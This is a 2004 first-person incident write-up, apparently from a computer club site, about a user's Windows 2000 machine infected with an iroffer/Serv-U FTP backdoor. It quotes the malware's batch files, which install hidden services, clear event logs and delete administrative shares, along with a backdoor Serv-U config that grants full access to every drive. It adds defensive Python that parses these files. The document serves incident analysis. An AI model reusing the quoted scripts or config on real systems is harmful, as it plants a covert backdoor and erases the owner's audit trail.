
And a few seconds after I clicked the popup off, it came right back up. I tried rebooting (not easily done with the continuous popups), but that did not help; they resumed popping up.
According to http://iroffer.org/, iroffer is a software program that acts as a fileserver for IRC. It is similar to an FTP server or web server, but users download files using the DCC protocol of IRC instead of a web browser.
The problem is that, as far as I know, I never installed such a program, and I have no use for one.
I did use mIRC last night, for a teleconference with APCUG, and perhaps someone had a machine with iroffer installed on it, and perhaps it transferred it to my machine. I don't know any other way I would have gotten it.
I had Norton do a scan of my system, and 3 hours, 59 minutes, 35 seconds later it reported "No infection found".
So Norton thinks that iroffer is not a problem then? Then why do I see an entry in Norton's Quarantine File for: "sec.bat", "C:\WINNT\system32\ias", "7.48 KB", "Sunday, March 28, 2004 11:51:45 PM", "", "Quarantined", "SYSTEM", "DON", "SINGLETON", "BAT.Trojan"? That is approximately the time that I was infected with the iroffer Trojan. I had no problem with the computer at 9:39 pm Sunday, when the APCUG Teleconference, where I was using mIRC, ended. Then I left the computer room and went in to watch some TV before going to bed, and when I got up the next morning and came into the computer room, I was infected. Whether it happened during the teleconference, i.e. because of my use of mIRC, and it just took a while before the trojan launched itself, or whether there was a very strange coincidence that I would receive two email messages, one with sec.bat that Norton recognized and quarantined, and another with iroffer.exe which it let slip by, I don't know. My "C:\WINNT\system32\ias" folder does not contain a sec.bat. It does contain a sec2.bat with a Last Updated date of 2/25/2004 that contains:
    echo REGEDIT4>>root.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
    echo "NetworkStartup"="net share IPC$ /delete /yes">>root.reg
    echo "Secure"="net share ADMIN$ /delete /yes">>root.reg
    echo "Secure1"="net share C$ /delete /yes">>root.reg
    echo "Secure2"="net share D$ /delete /yes">>root.reg
    regedit /S root.reg
    del root.reg
    echo.
    net share ADMIN$ /delete /yes
    net share C$ /delete /yes
    net share D$ /delete /yes
    net share IPC$ /delete /yes
I don't have a root.reg file on my computer; however, that is not surprising, because the sec2.bat file above deletes it (del root.reg).
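The batch file above never ships a .reg file: it assembles one line by line with "echo ... >>root.reg", imports it silently with "regedit /S", and deletes it. The added Python example below (written for this article; it is not the malware's code and not part of the original page) replays those redirections to reconstruct root.reg, parses it as a REGEDIT4 file, and lists what the batch plants under the HKLM Run key. The only input is the sec2.bat text quoted above; the function and variable names are mine.

```python
"""Reconstruct the root.reg that sec2.bat builds with 'echo ... >>' lines and
list what it registers under the HKLM Run key.

Added example for this article; not the malware's code and not part of the
original page.  SEC2_BAT is the batch text quoted in the article."""
import re
from typing import Dict, List, Tuple

SEC2_BAT = r"""echo REGEDIT4>>root.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>root.reg
echo "NetworkStartup"="net share IPC$ /delete /yes">>root.reg
echo "Secure"="net share ADMIN$ /delete /yes">>root.reg
echo "Secure1"="net share C$ /delete /yes">>root.reg
echo "Secure2"="net share D$ /delete /yes">>root.reg
regedit /S root.reg
del root.reg
echo.
net share ADMIN$ /delete /yes
net share C$ /delete /yes
net share D$ /delete /yes
net share IPC$ /delete /yes
"""

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
ECHO_APPEND = re.compile(r"^echo (.*?)>>(\S+)$")      # echo TEXT>>FILE
REG_VALUE = re.compile(r'^"([^"]*)"="(.*)"$')         # "name"="string value"
SHARE_DELETE = re.compile(r"^net share (\S+) /delete")


def reconstruct_files(batch: str) -> Dict[str, str]:
    """Replay every 'echo TEXT>>FILE' line; returns {filename: contents}.
    cmd.exe echoes the text verbatim, quotes included, so nothing is unquoted."""
    files: Dict[str, List[str]] = {}
    for raw in batch.splitlines():
        m = ECHO_APPEND.match(raw.strip())
        if m:
            files.setdefault(m.group(2), []).append(m.group(1))
    return {name: "\n".join(lines) + "\n" for name, lines in files.items()}


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal REGEDIT4 parser: [key] headers followed by "name"="value" lines."""
    reg: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            reg.setdefault(current, {})
            continue
        m = REG_VALUE.match(line)
        if m and current is not None:
            reg[current][m.group(1)] = m.group(2)
    return reg


def run_entries(batch: str) -> List[Tuple[str, str]]:
    """(value name, command) pairs the batch file plants under the Run key."""
    reg = parse_reg(reconstruct_files(batch).get("root.reg", ""))
    return sorted(reg.get(RUN_KEY, {}).items())


def shares_removed(batch: str) -> Dict[str, List[str]]:
    """Administrative shares the batch deletes: 'now' for the direct
    'net share' lines, 'at_logon' for the same commands re-run via the Run key."""
    at_logon, now = set(), set()
    for _, cmd in run_entries(batch):
        m = SHARE_DELETE.match(cmd)
        if m:
            at_logon.add(m.group(1))
    for raw in batch.splitlines():
        m = SHARE_DELETE.match(raw.strip())
        if m:
            now.add(m.group(1))
    return {"at_logon": sorted(at_logon), "now": sorted(now)}


if __name__ == "__main__":
    print(reconstruct_files(SEC2_BAT)["root.reg"])
    for name, cmd in run_entries(SEC2_BAT):
        print(f"Run\\{name} = {cmd}")
    print(shares_removed(SEC2_BAT))
```

Run as a script it prints the reconstructed root.reg, the four Run values (NetworkStartup, Secure, Secure1, Secure2) and the shares they remove. The innocuous-looking value names are the point: each one re-deletes an administrative share at every logon, so the shares keep vanishing even after an administrator restores them, while the actual persistence for iroffer and Serv-U lives elsewhere (the FireDaemon services installed by run.bat).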
Since Norton was not much help, and since I don't run McAfee (who provided instructions for removing it with VirusScan 4.x, and other instructions for VirusScan 7 or later users), I did some searching on my machine. C:\WINNT\system32\ias had a file named iroffer.exe with a "last updated" date of 2/21/2004, and a file run.bat with a "last updated" date of 3/18/2004 which contained:
    SET MXHOME=c:\winnt\system32\ias
    SET MXBIN=c:\winnt\system32\ias
    c:\winnt\system32\ias\firedaemon -i Service "c:\winnt\system32\ias" "c:\winnt\system32\ias\iroffer.exe" "config.conf" Y 0 0 0 Y
    c:\winnt\system32\ias\firedaemon -i serv "c:\winnt\system32\ias" "c:\winnt\system32\ias\serveu.exe" "" Y 0 0 0 Y
    net start serv
    net start Service
    c:\winnt\system32\ias\clearlogs.exe \\127.0.0.1 -app
    c:\winnt\system32\ias\clearlogs.exe \\127.0.0.1 -sys
    c:\winnt\system32\ias\clearlogs.exe \\127.0.0.1 -sec
    c:\winnt\system32\ias\sec.bat
    c:\winnt\system32\ias\sec2.bat
Look at this graphic, and note that C:\WINNT\system32\ias contains iroffer.exe and it also contains run.bat

I could not delete it, because it was a running program, but I was able to stop the popups by renaming iroffer.exe to stopiroffer.exe and renaming run.bat to dontrun.bat

I still have something that is looking for iroffer.exe and run.bat, because I renamed them back, in order to do the screen captures for this article, and the popup again came up. I did my screen capture and renamed them back immediately. If you know anything that would help clear up exactly what happened, and what, if anything, I should do now, please let me know.
I may have figured it out. I also noticed that C:\WINNT\system32\ias has three files for a program called ServU:
Initially I did not notice them, because I am very familiar with ServU. It is a good FTP program, which I installed on the APCUG Web Servers when I was in charge of them. But I never installed it on my computer. Yet there it was: serveu.exe in my C:\WINNT\system32\ias folder, and servudaemon.ini and ServUStartUpLog.txt have Last Updated dates of 3/29/2004 7:44 AM.
ServUStartUpLog.txt contains:
    Mon 29Mar04 07:43:59 - Serv-U FTP Server v3.0 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved - by Rob Beckers
    Mon 29Mar04 07:43:59 - Cat Soft is an affiliate of Rhino Software, Inc.
    Mon 29Mar04 07:44:00 - Using WinSock 2.0 - max. 32767 sockets
    Mon 29Mar04 07:44:00 - Starting FTP Server...
    Mon 29Mar04 07:44:03 - FTP Server listening on port number 444, IP 127.0.0.1, 127.0.0.1
    Mon 29Mar04 07:44:03 - FTP Server listening on port number 43958, IP 127.0.0.1
    Mon 29Mar04 07:44:03 - Valid registration key found
servudaemon.ini contains:
    [GLOBAL]
    Version=3.0.0.17
    RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagAAA6vVLz5CDgL/BkJ1c2hleQZCdXNoZXk
    MaxNrUsers=999
    OpenFilesUploadMode=Shared
    SocketKeepAlive=1
    PacketTimeOut=300
    ProcessID=740
    [DOMAINS]
    Domain1=0.0.0.0||444|j|1
    [Domain1]
    SignOn=C:\winnt\system32\ias\welcome.txt
    User1=Owner|1|0
    User2=Upload|1|0
    [USER=Owner|1]
    Password=CrYpTeDIRPaSs
    HomeDir=c:\
    TimeOut=600
    Maintenance=System
    Note1="Wizard generated account"
    Access1=C:\|RWAMELCDP
    Access2=D:\|RWAMELCDP
    Access3=E:\|RWAMELCDP
    Access4=F:\|RWAMELCDP
    Access5=G:\|RWAMELCDP
    Access6=H:\|RWAMELCDP
    Access7=I:\|RWAMELCDP
    Access8=J:\|RWAMELCDP
    Access9=K:\|RWAMELCDP
    Access10=L:\|RWAMELCDP
    Access11=M:\|RWAMELCDP
    Access12=N:\|RWAMELCDP
    Access13=O:\|RWAMELCDP
    Access14=P:\|RWAMELCDP
    Access15=Q:\|RWAMELCDP
    Access16=R:\|RWAMELCDP
    Access17=S:\|RWAMELCDP
    Access18=T:\|RWAMELCDP
    Access19=U:\|RWAMELCDP
    Access20=V:\|RWAMELCDP
    Access21=W:\|RWAMELCDP
    Access22=X:\|RWAMELCDP
    Access23=Y:\|RWAMELCDP
    Access24=Z:\|RWAMELCDP
    [USER=Upload|1]
    Password=CrYpTeDIRPaSs
    HomeDir=c:\winnt\system32\ias\upload
    RelPaths=1
    TimeOut=600
    Maintenance=Group
    Access1=C:\winnt\system32\ias\upload|RWALCP
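The startup log and servudaemon.ini above tell the whole story of the FTP back door: two listeners (444 and 43958, both bound to 127.0.0.1 according to the log), an "Owner" account whose home directory is c:\ and which holds the RWAMELCDP access mask on every drive letter from C: to Z:, with Maintenance=System (Serv-U's server-administrator level), plus an "Upload" account confined to the ias\upload folder. The added Python example below (written for this article; not Serv-U's code and not part of the original page) parses both files and reports exactly those facts, so the same check can be run against any other Serv-U 3.x installation found in an odd place. The config and log text are reconstructed from the listings above, with Access3..Access23 regenerated since they follow the same per-drive pattern and the RegistrationKey line left out; it interprets only the W letter of the access mask (write) and passes the rest through.

```python
"""Audit a Serv-U 3.x servudaemon.ini and ServUStartUpLog.txt for a hidden
FTP back door: listening sockets, accounts, and what each account can reach.

Added example; not part of the original page and not Serv-U's own code.
CONFIG and LOG are reconstructed from the article's listings (Owner's
Access3..Access23 regenerated, RegistrationKey omitted)."""
import re
from typing import Dict, List, Tuple

# Owner account: Access1..Access24 = C:\ .. Z:\ with mask RWAMELCDP
ACCESS_LINES = "".join(
    f"Access{i}={chr(ord('C') + i - 1)}:\\|RWAMELCDP\n" for i in range(1, 25)
)
CONFIG = (
    "[GLOBAL]\nVersion=3.0.0.17\nMaxNrUsers=999\nProcessID=740\n"
    "[DOMAINS]\nDomain1=0.0.0.0||444|j|1\n"
    "[Domain1]\nSignOn=C:\\winnt\\system32\\ias\\welcome.txt\n"
    "User1=Owner|1|0\nUser2=Upload|1|0\n"
    "[USER=Owner|1]\nPassword=CrYpTeDIRPaSs\nHomeDir=c:\\\nTimeOut=600\n"
    "Maintenance=System\nNote1=\"Wizard generated account\"\n"
    + ACCESS_LINES
    + "[USER=Upload|1]\nPassword=CrYpTeDIRPaSs\n"
    "HomeDir=c:\\winnt\\system32\\ias\\upload\nRelPaths=1\nTimeOut=600\n"
    "Maintenance=Group\nAccess1=C:\\winnt\\system32\\ias\\upload|RWALCP\n"
)
LOG = """Mon 29Mar04 07:43:59 - Serv-U FTP Server v3.0 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved - by Rob Beckers
Mon 29Mar04 07:44:00 - Starting FTP Server...
Mon 29Mar04 07:44:03 - FTP Server listening on port number 444, IP 127.0.0.1, 127.0.0.1
Mon 29Mar04 07:44:03 - FTP Server listening on port number 43958, IP 127.0.0.1
Mon 29Mar04 07:44:03 - Valid registration key found
"""

Section = List[Tuple[str, str]]
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
LISTEN = re.compile(r"listening on port number (\d+), IP ([\d.]+)")


def parse_ini(text: str) -> Dict[str, Section]:
    """Serv-U's INI uses section names like [USER=Owner|1] and repeats AccessN
    keys, so each section is kept as an ordered list of (key, value)."""
    sections: Dict[str, Section] = {}
    current: Section = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1], [])
        elif "=" in line:
            key, value = line.split("=", 1)
            current.append((key.strip(), value.strip()))
    return sections


def listeners(log: str) -> List[Tuple[int, str]]:
    """(port, first bound IP) for every 'listening on' line in the startup log."""
    return [(int(m.group(1)), m.group(2)) for m in LISTEN.finditer(log)]


def domain_ports(cfg: Dict[str, Section]) -> List[int]:
    """DomainN=ip||port|... entries in [DOMAINS]; the port is the third field."""
    ports = []
    for key, value in cfg.get("DOMAINS", []):
        parts = value.split("|")
        if key.startswith("Domain") and len(parts) > 2 and parts[2].isdigit():
            ports.append(int(parts[2]))
    return ports


def users(cfg: Dict[str, Section]) -> List[dict]:
    """One record per [USER=name|n] section with its AccessN (path, mask) list."""
    out = []
    for name, body in cfg.items():
        if not name.startswith("USER="):
            continue
        fields = dict(body)
        access = [tuple(v.split("|", 1)) for k, v in body if k.startswith("Access")]
        out.append({"name": name[5:].split("|")[0],
                    "home": fields.get("HomeDir", ""),
                    "maintenance": fields.get("Maintenance", ""),
                    "access": access})
    return out


def audit(cfg: Dict[str, Section]) -> List[str]:
    """Flag accounts rooted at a drive, with write access (W in the mask) to
    whole drives, or with Maintenance=System (server-administrator level)."""
    findings = []
    for u in users(cfg):
        if DRIVE_ROOT.match(u["home"]):
            findings.append(f"{u['name']}: home directory is a drive root ({u['home']})")
        drives = [p for p, mask in u["access"] if DRIVE_ROOT.match(p) and "W" in mask]
        if drives:
            findings.append(f"{u['name']}: write access to {len(drives)} whole drive(s)")
        if u["maintenance"] == "System":
            findings.append(f"{u['name']}: Maintenance=System")
    return findings


if __name__ == "__main__":
    cfg = parse_ini(CONFIG)
    print("log listeners:", listeners(LOG), "config ports:", domain_ports(cfg))
    for line in audit(cfg):
        print("FINDING", line)
```

Against the reconstructed files it reports the two loopback listeners and three findings, all for the Owner account; the Upload account, limited to RWALCP on one folder, produces none. Port 43958 is not in the [DOMAINS] section at all, which is why both the log and the config are worth reading: the log shows what actually bound, the config shows who can log in.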
How it got installed I don't know. My ZoneAlarmPro Program List does not mention it,
so somehow it must have access to the Internet that ZoneAlarmPro does not know about.
Norton never heard of ServU, but McAfee had three listings:
They say: "The Serv-U FTP daemon is a popular commercial FTP server. This application has been used by many trojans for malicious purposes, where files are renamed to try to fool people into thinking that they are Windows system files. These renamed files will be picked up with regular detection within the on-access or on-demand scanners.
Files for this application that have not been renamed will require /PROGRAM detection. The current command-line scanner makes use of such detections, as does VirusScan 7."
Unfortunately I run Norton, and they don't have any removal instructions, so I just renamed the files (I could not delete them because they were in use), rebooted, and then deleted the files. I got a new ServUStartUpLog.txt which said "Wed 31Mar04 09:31:00 - OUT-OF-DATE! This trial version of Serv-U is out-of-date!", so hopefully that will prevent them from being used again. I created a shortcut for C:\winnt\system32\ias on my desktop, and will keep an eye on new stuff appearing there.
I may have made a mistake going with Norton. I checked their website, which says "If, after running a scan, you need assistance removing a virus, or you cannot run a scan of any kind, then call our virus removal line for assistance," and the only choices they offered were:
They don't even offer a way to email them, to tell them that their competition has a solution for a problem that they don't, and to ask whether they can come up with an alternative to going with their competition.
I ran McAfee FreeScan (Select McAfee FreeScan from the Free Services section)

McAfee identified one infected file, C:\WINNT\system32\ias\dontrun.bat, which they said contained IRC-Demfire.bat, a Trojan discovered 2/7/2003.
Removal instructions were to stop two services:
I don't have Rundll running, but I have three copies of svchost running, but I can't stop any of them.

I have one copy of svchost.exe, in c:\winnt\system32. I would delete it; however, it appears it may be needed. I also have a rundll32.exe, also in c:\winnt\system32, but it also appears it may be needed.
The McAfee file also referred to both Rundll and svchost being started as FireDaemon services. FireDaemon does not appear to be a normal part of Win2K, but rather something one could install. I found another page which seemed to indicate it was involved with a compromised system, and I found a copy of it in C:\WINNT\system32\ias, so I renamed it to another name, so it could not be found easily.
Since McAfee found my renamed "dontrun.bat" and identified it as being infected, I went ahead and deleted it and also the renamed stopiroffer.exe, and emptied my recycle bin.
For more information on the Tulsa Computer Society click here